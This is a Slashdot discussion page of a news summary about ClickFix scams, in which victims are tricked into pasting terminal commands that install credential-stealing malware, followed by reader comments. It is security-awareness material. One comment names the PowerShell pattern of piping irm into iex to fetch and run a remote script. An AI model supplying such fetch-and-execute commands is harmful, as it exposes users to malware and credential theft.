ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com)
- Reference: 0180050956
- News link: https://it.slashdot.org/story/25/11/11/2233201/clickfix-may-be-the-biggest-security-threat-your-family-has-never-heard-of
- Source link: https://arstechnica.com/security/2025/11/clickfix-may-be-the-biggest-security-threat-your-family-has-never-heard-of/
> ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text [1]causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware . Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.
>
> The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
Researchers from CrowdStrike described in [2]a report a campaign designed to infect Macs with a Mach-O executive. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."
Push Security, meanwhile, [3]reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
[1] https://arstechnica.com/security/2025/11/clickfix-may-be-the-biggest-security-threat-your-family-has-never-heard-of/
[2] https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/
[3] https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/
WTF? (Score:5, Insightful)
Why the hell would someone go open a terminal window and paste random shit in from a web page?
Re: (Score:2)
Because you can't fix stupid?
Re: (Score:2)
> Because you can't fix stupid?
Guessing you really can't ClickFix it. :-)
Re: (Score:3)
"When you're dead, you do not know that you are dead. The pain is felt by others. The same thing happens when you're stupid"
Re: (Score:2)
This is comedy gold. Thanks for my laugh of the day.
Re: (Score:2)
Because they don't know any better. Some official looking web site says to press some buttons and do some thing, they do it. No different than amazon prompting them to type in their credit card number to buy steak knives. Even among knowledgeable people... There is an RMM I use, if you hit F12 in the browser, the hidden browser console has bright red bold font telling you not to paste anything into the console. And it's an RMM tool for IT people.
Re: (Score:2)
Credulous boomers that think it's 1950 and the people inside their teeve^H^H^H^H^Hcomputer are benign white folk like them.
Re: (Score:2)
Average person wouldn't even know what the terminal is, much less how to go about running terminal commands. And anyone that knows what the terminal is, should be smart enough to know not to run terminal commands from any website, even ones you trust.
Re: (Score:2)
Probably because they see idiots typing in [1]"do as I say" [reddit.com] without reading the prompt and then bitch about the broken system after the fact as if it's normal.
Heads up people: If you see a black box with a blinking text cursor and no fancy Word functions, that's an expert-only area and you should leave it the fuck alone!
[1] https://www.reddit.com/r/linux/comments/r8a0y6/my_opinion_on_the_do_as_i_say_problem/
Hey Guys! Click! Fix! Here (Score:2)
Today, we are gonna learn how to bypass al security safeties with simple hand tools. We will need a breaker bar, a torque wrench and our safety glasses
PowerShell defaults (Score:5, Informative)
PowerShell defaults are partly to blame on the Windows side. You can't double click a .ps1 file without editing security settings. But you can pipe an irm command into iex and run a random script from the web with no checks at all. Just a one-liner copied and pasted and you're giving complete control over.
Re: (Score:2)
OK I see the problem. We need to take away the ability to paste from end users. /s
Ugh (Score:2)
Man, at this point I am thinking I should just disable all links in any email I get.
You can't fix stupid (Score:2)
> The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.
I mean . . come on
maybe I'm too dumb, but (Score:1)
how it's possibly that the file download itself and execute itself without me interacting with it in MacOS? if it's a payload it have to be an .app, .dmg file, because a .sh file need to change permissions to execution to be executed in the gui, otherwise it is treated like a regular file
Re: (Score:3)
If my understanding of this part of the summary is correct:
> "The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. "
what happens is, the user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.
Re: (Score:2)
LOL!
Sorry, you lost me at... (Score:2)
"The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter"
Seriously??
The old days... (Score:2)
Ah yes, reminds me of the bad old days of the first PDP-8 virus:
"Your bank account has been compromised. To restore security, toggle in the following sequence on your PDP-8 front panel: 110101-010010 111110-000000 ..."
Re: (Score:3)
The reason we don't, historically, is because a good number of us have personal experience in dealing with these kinds of "ordinary folks" endlessly .
Initially we were sympathetic, and offered guidance. After a while we all got tired of listening to the excuses and apologies.
Those "ordinary folks" got the idea that as long as they gave a good sounding excuse or apologized in front of management that there would be no consequences. For them . For us we have to spend time cleaning up their mess, and taking
Are people this ignorant of basic online security? (Score:4, Informative)
Clearly.
Fortunately there is an easy fix. Education. Never click on links from any email you receive unless you just initiated the link being sent to you. Go to the businesses actual website, log in from there. If it’s legit you’ll very likely see what it was talking about upon login or after a brief search through the sites menus.
Unfortunately for many people, they are too lazy, ignorant, and/or refuse to take basic and easy precautions. And yes, some people are just dumb on their best days. That’s why things like this work if you send such scams to enough people.
Re: (Score:2)
Yes, but half the people have below-average intelligence.
We won't have a stable society if they're constantly scammed.
And I know some High-IQ people with no street smarts who got scammed by "Raj from Microsoft Support".
Really some dude from a trailer park might have a better BS detector, having lived a less coddled existence.
Re: (Score:2)
> Never click on links from any email you receive unless you just initiated the link being sent to you.
Certainly don't ever, "copy a string of text, open a terminal window, paste it in, and press Enter".
Seriously, why would any legitimate site ask you to do that. [*smacks forehead*]